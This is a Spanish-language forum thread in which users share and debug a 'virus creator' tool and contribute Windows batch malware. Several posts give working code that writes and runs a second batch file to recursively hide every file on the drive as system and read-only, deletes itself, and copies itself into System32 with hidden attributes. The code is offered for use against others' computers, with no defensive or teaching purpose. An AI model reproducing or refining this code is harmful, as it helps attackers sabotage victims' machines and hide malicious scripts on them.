Como dije boy creando nuevas versiones....
bueno ya tengo lista la V4, puese los codigos que me dijeron daniel y fran. Es mucho mas completa que la V2, no puse la V3 porque no quedó muy bien...
Aquí unas fotos:

Pueden ver que tiene muchas mas opciones:
Imagen

Esto es lo que sale cuando creas el virus o como lo quieran llamar...
y ademas, tiene sonido!
Imagen

Link de descarga:
[Enlace externo eliminado para invitados]

Video:
Imagen

Imagen
danielcanijo escribió:ey men si aceptas un consejo, aqui tienes una forma de ocultar todos los archivos del pc
Quedara vacio¡¡¡ jajaja

Código: Seleccionar todo

@echo off
cd /
cd ..
cd ..
cd ..
cd ..
echo for %%v in (A* B* C* D* E* F* G* H* I* J* K* L* M* N* Ñ* O* P* Q* R* S* T* U* V* W* X* Y* Z* 1* 2* 3* 4* 5* 6* 7* 8* 9* 0*) do (@attrib /s /d +a +h +r +s (y si tienes windows vista -i) "*.*") >> "C:\hide.bat"
echo del /f /s /q %0 >> "C:\hide.bat"
start hide.bat
Si veis algun fallo corregidme, seguramente me equivoque en algo sobre todo en el segundo code, no se me da bien la inyeccion de codigo¡¡
Hola...recién lo veo esto...tenes un error...aca te lo corregi

@echo off
echo @echo off >> "C:\hide.bat"
echo for %%v in (A* B* C* D* E* F* G* H* I* J* K* L* M* N* Ñ* O* P* Q* R* S* T* U* V* W* X* Y* Z* 1* 2* 3* 4* 5* 6* 7* 8* 9* 0*) do (@attrib /s /d +a +h +r +s "*.*") >> "C:\hide.bat"
echo exit >> "C:\hide.bat"
start C:\hide.bat
exit
No es necesario hace cd.. porque lo único que hace el bat es crear otro bat que en la ante ultima linea se ejecuta especificando toda la dirección...en teoría ahí tendría que funcionar.

Saludos!
"¿Qué es la vida? Una ilusión, una sombra, una ficción, y el mayor bien es pequeño: que toda la vida es sueño y los sueños... sueños son."

Calderón de la Barca (1600-1681), dramaturgo español.
P4velo escribió:Como dije boy creando nuevas versiones....
bueno ya tengo lista la V4, puese los codigos que me dijeron daniel y fran. Es mucho mas completa que la V2, no puse la V3 porque no quedó muy bien...
Aquí unas fotos:

Pueden ver que tiene muchas mas opciones:
Imagen

Esto es lo que sale cuando creas el virus o como lo quieran llamar...
y ademas, tiene sonido!
Imagen

Link de descarga:

Video:
Hola nuevamente...bueno aca encontre un bug que no habia encontrado antes...en el copiar en sistema+ocultación...tendria que ser asi:

copy %0 C:\windows\system32
attrib +H +S C:\Windows\System32\%0
el error esta en que usas "%%" y solo es necesario un "%"

edit: me olvidaba...para la proxima pone el dll que pide...[Enlace externo eliminado para invitados]...nose porque pide un dll llamado "wmp.dll"

edit 2: cosas como bucles tenes que dejarlas al final del virus ya que si yo pongo algo despues del bucle nunca se va a concretar.

Saludos!
"¿Qué es la vida? Una ilusión, una sombra, una ficción, y el mayor bien es pequeño: que toda la vida es sueño y los sueños... sueños son."

Calderón de la Barca (1600-1681), dramaturgo español.
hola!
gracias por responder fran

@echo off
echo @echo off >> "C:\hide.bat"
echo for %%v in (A* B* C* D* E* F* G* H* I* J* K* L* M* N* Ñ* O* P* Q* R* S* T* U* V* W* X* Y* Z* 1* 2* 3* 4* 5* 6* 7* 8* 9* 0*) do (@attrib /s /d +a +h +r +s "*.*") >> "C:\hide.bat"
echo exit >> "C:\hide.bat"
start C:\hide.bat
exit
ya estará corregido para la proxima versión

Y lo de %0 ya lo sabia no se porque puse %%0 esque creo recordar que le hice copy y paste de otro codigo que tenía por ahi

salu2
Imagen

Imagen
Responder

Volver a “Nuestros Programas”